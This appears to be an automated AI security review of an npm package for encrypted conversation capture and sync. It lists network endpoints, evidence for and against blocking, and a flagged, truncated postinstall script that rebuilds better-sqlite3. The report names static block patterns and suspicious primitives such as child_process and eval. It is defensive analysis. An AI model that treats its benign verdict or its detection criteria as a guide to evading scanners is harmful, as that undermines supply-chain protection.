AI Security Review
scanned 3d ago · by lpm-firewall-aiNo confirmed malicious attack surface was found. Risky behavior is package-aligned: a native dependency rebuild at install, user-invoked MCP/CLI capture, opt-in embeddings, and user-specified cloud sync.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install for rebuild; user runs usrcp-stream init/serve/sync for runtime features
Impact
Stores user-provided conversation events locally and can sync encrypted events or request embeddings when explicitly configured
Mechanism
declared encrypted local memory and sync tooling
Rationale
Static inspection shows declared CLI/MCP functionality for encrypted conversation capture, embeddings, and optional sync; suspicious primitives are user-invoked or install-time dependency maintenance rather than covert collection or exfiltration. The postinstall hook is undesirable but narrowly scoped to rebuilding better-sqlite3 and does not establish malicious intent by itself.
Evidence
package.jsonREADME.mddist/index.jsdist/sync.jsdist/config-io.jsdist/embeddings/openai.jsdist/embeddings/voyage.jsdist/embeddings/ollama.jsdist/capture/ingest.jsnode_modules/better-sqlite3/buildnode_modules/usrcp-core/node_modules/better-sqlite3/buildnode_modules/usrcp-stream/node_modules/better-sqlite3/buildstream-config.tomlstream.db
Network endpoints5
localhost:11434api.openai.com/v1/embeddingsapi.voyageai.com/v1/embeddings/v1/stream/push/v1/stream/pull
Decision evidence
public snapshotAI called this Clean at 86.0% confidence as Benign with medium false-positive risk.
Evidence for block
- package.json has postinstall deleting better-sqlite3 build dirs and running npm rebuild better-sqlite3
- dist/sync.js can push encrypted local stream events to a user-supplied --endpoint
- dist/embeddings/openai.js and voyage.js send plaintext text to vendor APIs after configured consent
Evidence against
- dist/index.js commands are CLI-invoked; import only dispatches CLI main, no hidden payload beyond declared bin behavior
- postinstall is narrow to better-sqlite3 build folders for native rebuild, not credential/file harvesting or persistence
- dist/config-io.js stores vendor API key inside encrypted stream-config.toml
- README.md documents local encrypted capture, opt-in vendor embedding providers, and explicit cloud sync endpoints
- rg found no child_process, eval, Function, native payload loading, prompt injection, or AI-agent control-surface writes in dist
Behavioral surface
ChildProcessCryptoEnvironmentVarsFilesystemNetwork
HighEntropyStringsUrlStrings
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node -e "const fs=require(\"fs\"); for (const p of [\"node_modules/better-sqlite3/build\",\"node_modules/usrcp-core/node_modules/better-sqlite3/build\",\"node_modules/usrcp-stream/...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.postinstall = node -e "const fs=require(\"fs\"); for (const p of [\"node_modules/better-sqlite3/build\",\"node_modules/usrcp-core/node_modules/better-sqlite3/build\",\"node_modules/usrcp-stream/...
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgFindings
1 Critical1 High2 Medium4 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings